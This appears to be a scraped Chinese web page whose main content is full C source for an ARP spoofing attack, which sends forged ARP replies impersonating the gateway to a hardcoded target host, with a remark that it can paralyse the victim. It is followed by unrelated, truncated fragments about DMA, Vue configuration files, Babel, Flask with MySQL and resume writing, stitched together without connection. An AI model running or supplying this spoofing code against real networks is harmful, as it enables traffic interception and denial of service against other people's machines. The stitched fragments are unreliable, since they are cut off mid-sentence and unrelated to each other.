arp攻擊,arp病毒曾經瘋狂的流行了一陣子。 下面是簡單的arp攻擊原來的實現例子,只是一個示例,離真正的arp攻擊還有一點距離,現在的arp攻擊越來越隱蔽越來越高科技了。
(儘量少用,很容易使攻擊的主機癱瘓)
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <linux/if_packet.h> #include <netdb.h> #include <errno.h> #include <arpa/inet.h> #include <sys/ioctl.h> #include <pthread.h> #include <pcap.h> #include <net/ethernet.h> #include <netinet/ether.h> #include <net/if.h> #include <netinet/ip.h> int sockfd; struct sockaddr_ll peer_addr; unsigned char my_ip[4] = {192, 168, 1,100}; //my ip address unsigned char gateway_ip[4] = {192, 168, 1, 1}; //gateway ip address unsigned char attack_ip[4] = {192, 168, 1, 8}; //ip address to be attacked unsigned char my_mac[6] = {0x00,0x24,0x01,0x04,0x59,0x65 }; //my mac address //封裝arp包 struct arp_packet { struct ether_header eh; struct ether_arp arp; }; //封裝ip包 struct ip_packet{ struct ether_header eh; struct iphdr ip; }; void send_arp(const unsigned char* attack_ip); void process_arppachet(struct arp_packet *packet); void echo_head(char *); void echo(char *); void echo_end(char *); /** * 發送arp包到攻擊主機 */ void send_arp(const unsigned char* attack_ip) { unsigned char broad_mac[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};//發送廣播包爲了獲取網關地址 //開始構造arp楨 struct arp_packet frame; memcpy(frame.eh.ether_dhost, broad_mac, 6); memcpy(frame.eh.ether_shost, my_mac, 6); frame.eh.ether_type = htons(ETH_P_ARP); frame.arp.ea_hdr.ar_hrd = htons(ARPHRD_ETHER); frame.arp.ea_hdr.ar_pro = htons(ETH_P_IP); frame.arp.ea_hdr.ar_hln = 6; frame.arp.ea_hdr.ar_pln = 4; frame.arp.ea_hdr.ar_op = htons(ARPOP_REQUEST); memcpy(frame.arp.arp_sha, my_mac, 6); memcpy(frame.arp.arp_spa, my_ip, 4); memcpy(frame.arp.arp_tha, broad_mac, 6); memcpy(frame.arp.arp_tpa, attack_ip, 4); sendto(sockfd, &frame, sizeof(frame), 0, (struct sockaddr*)&peer_addr, sizeof(peer_addr)); printf("success send arp request to 192.168.1.%d/n", attack_ip[3]); } /** * 分析arp包 */ void process_arppacket(struct arp_packet *packet) { echo_head("process_arppacket"); struct arp_packet *old_frame = packet; struct arp_packet frame; memcpy(&frame, packet, sizeof(frame)); int ar_op = ntohs(frame.arp.ea_hdr.ar_op); // ------------------------------------arp frame info------------------------------------------------------- if (ar_op == ARPOP_REQUEST) printf("arp request/t"); if (ar_op == ARPOP_RREPLY) printf("arp reply /t"); char ip_buf[128]; inet_ntop(AF_INET, &old_frame->arp.arp_spa, ip_buf, sizeof(ip_buf)); printf("[%s](%s)", ether_ntoa((struct ether_addr *) &old_frame->arp.arp_sha), ip_buf); printf("/t->/t"); memset(ip_buf, 0, sizeof(ip_buf)); inet_ntop(AF_INET, &old_frame->arp.arp_tpa, ip_buf, sizeof(ip_buf)); printf("[%s](%s)", ether_ntoa((struct ether_addr *) &old_frame->arp.arp_tha), ip_buf); printf("/n"); // --------------------------------------------------------------------------------------------- if(ar_op == ARPOP_REPLY && (old_frame->arp.arp_spa)[3] == attack_ip[3] && (old_frame->arp.arp_tpa)[3] == my_ip[3]) { //normal arp reply from attack_ip //bulid faked arp reply frame memcpy(frame.eh.ether_dhost, old_frame->arp.arp_sha, 6); memcpy(frame.eh.ether_shost, my_mac, 6); frame.eh.ether_type = htons(ARPOP_REPLY); memcpy(frame.arp.arp_tha, old_frame->arp.arp_sha, 6); memcpy(frame.arp.arp_tpa, attack_ip, 4); memcpy(frame.arp.arp_sha, my_mac, 6); memcpy(frame.arp.arp_spa, gateway_ip, 4); //send faked arp reply frame sendto(sockfd, &frame, sizeof(frame), 0, (struct sockaddr*)&peer_addr, sizeof(peer_addr)); printf("success faked 192.168.1.%d /n", (old_frame->arp.arp_spa)[3]); } if(((ar_op == ARPOP_REQUEST) && (old_frame->arp.arp_spa)[3] == gateway_ip[3]) || (ar_op == ARPOP_REQUEST && (old_frame->arp.arp_spa)[3] == attack_ip[3] && (old_frame->arp.arp_tpa)[3] == gateway_ip[3])) { //case 2 a sleep(1); send_arp(attack_ip); } } void process_ippacket(struct iphdr *ip){ echo_head("process_ippacket"); struct in_addr addr; addr.s_addr = ip->saddr; printf("%s---->",inet_ntoa(addr)); addr.s_addr = ip->daddr; printf("%s/n",inet_ntoa(addr)); int protocol = ip->protocol; switch(protocol){ case IPPROTO_TCP: printf("tcp/n"); break; case IPPROTO_UDP: printf("udp"); break; case IPPROTO_SCTP: break; default: printf("the protocol is:%d/n",protocol); break; } echo_end("process_ippacket"); } //pcap 回掉函數,用於監聽網絡上的數據包 void callback(unsigned char *args, const struct pcap_pkthdr *head, const unsigned char *packet) { struct ether_header *eh = (struct ether_header *) packet; switch (ntohs(eh->ether_type)) { case ETHERTYPE_ARP: if (head->len > sizeof(struct ether_header) + sizeof(struct iphdr)) { process_arppacket((struct arp_packet *) packet); } break; case ETHERTYPE_IP: if (head->len > sizeof(struct ether_header) + sizeof(struct iphdr)) { process_ippacket((struct iphdr *)(packet+sizeof(struct ether_header))); } break; default: printf("ether type is:%x/n",eh->ether_type); break; } } //通過pcap監聽網絡情況 void *arp_listen(void *arg) { char errbuf[1024]; char *dev= "wlan0"; pcap_t *handle = pcap_open_live(dev, 2048, 1, 1000, errbuf); if(handle == NULL)printf("pcap_open_live():%s/n", errbuf); unsigned int net,mask; if(pcap_lookupnet(dev, &net, &mask, errbuf) == -1)printf("pcap_lookupnet():%s/n", errbuf); struct bpf_program fp; if(pcap_compile(handle, &fp, "arp or ip", 0, net) == -1)printf("pcap_compile():%s/n", errbuf); if(pcap_setfilter(handle, &fp) == -1)printf("pcap_setfilter():%s/n", errbuf); while(pcap_loop(handle, -1, callback, NULL) != -1); return NULL; } int main(int argc, char **argv) { pthread_t tid; pthread_create(&tid, NULL, arp_listen, NULL); sockfd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ARP)); if(sockfd == -1)perror("socket()"); memset(&peer_addr, 0, sizeof(peer_addr)); peer_addr.sll_family = AF_PACKET; struct ifreq req; strcpy(req.ifr_name, "wlan0"); if(ioctl(sockfd, SIOCGIFINDEX, &req) != 0)perror("ioctl()"); peer_addr.sll_ifindex = req.ifr_ifindex; peer_addr.sll_protocol = htons(ETH_P_ARP); send_arp(attack_ip);//給攻擊ip發送僞造的arp包 pthread_exit(NULL);//退出主線程 return 0; } void echo_head(char *str){ if(str==NULL){ return; } printf("------------------------------------------------BEGIN %s------------------------------------------------/n",str); } void echo(char *str){ if(str==NULL){ return; } printf("%s/n",str); } void echo_end(char *str){ if(str==NULL){ return; } printf("------------------------------------------------END %s------------------------------------------------/n",str); }
DMA(Direct memory access,內存直接存取),屬於 Vectored I/O 方式,也是下沉運算的一種實現。 區別 Scatter-gather DMA 與 Block DMA(即普通DMA) 方式不同, Block D
Apifox 2.5.20
https://blog.csdn.net/qq_57005976/article/details/129006241
2024-04-29,23點33 看看另外一種只用mysql來維護json持續化.然後flask維護一個內存裏面的json來查詢用是不是可行. 每次啓動服務,先把所有mysql中的json字符串,反序列化成一個變量. 每次修改數據,就更新m
babel.config.js 1 概述Babel 相當於一箇中介,一邊是用戶,另一邊是瀏覽器。這幾年,JavaScript 發生了很大的變化,許多新特性在很多瀏覽器裏都不支持。Babel 的主要作用就是規避這些問題,可以確保 Java
https://www.cnblogs.com/webwangjie/p/11471542.html 一、main.js 1、 main.js 程序入口文件,初始化vue實例,並引入使用需要的插件和各種公共組件. imp
Vue .eslintignore 項目根目錄如果沒有 .eslintignore 文件,需要手動添加即可 用法如下 指定某文件夾包括裏面的所有文件都忽略 build src/assets 指定某文件夾裏面的指定文件類型都忽略
https://www.jianshu.com/p/0d6a0bdce55c?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommend
Vue.js 是一種流行的開源 JavaScript 框架,被廣泛用於構建現代化的 Web 應用程序。Vue.js 用於構建用於數據響應的單頁面應用程序,但是在處理大型項目時可能會出現許多臨時文件和配置文件,這些文件可以使用 .gitig
目錄 vue項目構建之jsconfig.json作用 VScode的配置vue項目構建之jsconfig.json作用 由於webpack別名配置好以後,如果想要在vscold中可以正確提示路徑,就需要配置jsconfig
Vue .eslintrc.js https://blog.csdn.net/weixin_33721344/article/details/88685833 Vue的Eslint配置文件eslintrc.js說明與規則介紹 最近
https://www.bilibili.com/video/BV1ub4y1i78b?p=2 第五章 什麼是 vue3 的生命週期 https://www.bilibili.com/video/BV1ua4y1u7N8/ Vu
Vue .browserslistrc 在使用腳手架搭建項目時,會自動生成.browserslistrc文件,該文件只要是 配置兼容瀏覽器對於部分配置參數做一些解釋:" >1%" :代表着全球超過1%人使用的瀏覽器“last 2 ve
前端Vue 執行流程 Vue的執行流程 一般來說,當啓動vue程序時,系統會先調用main.js文件 在main.js中,創建了一個新的vue對象並將其掛載到App.vue中id爲app的html組件中 在App.js中,引入<
要儘量提供個人簡歷中提到的業績和能力的證明資料,並作爲附件附在個人簡歷的後面。一定要記住是複印件,千萬不要寄原件給招聘單位,以防丟失。一定要用積極的語言,切忌用缺乏自信和消極的語言寫個人簡歷。 最好的方法是在心情好的時候編寫個人簡歷。不能憑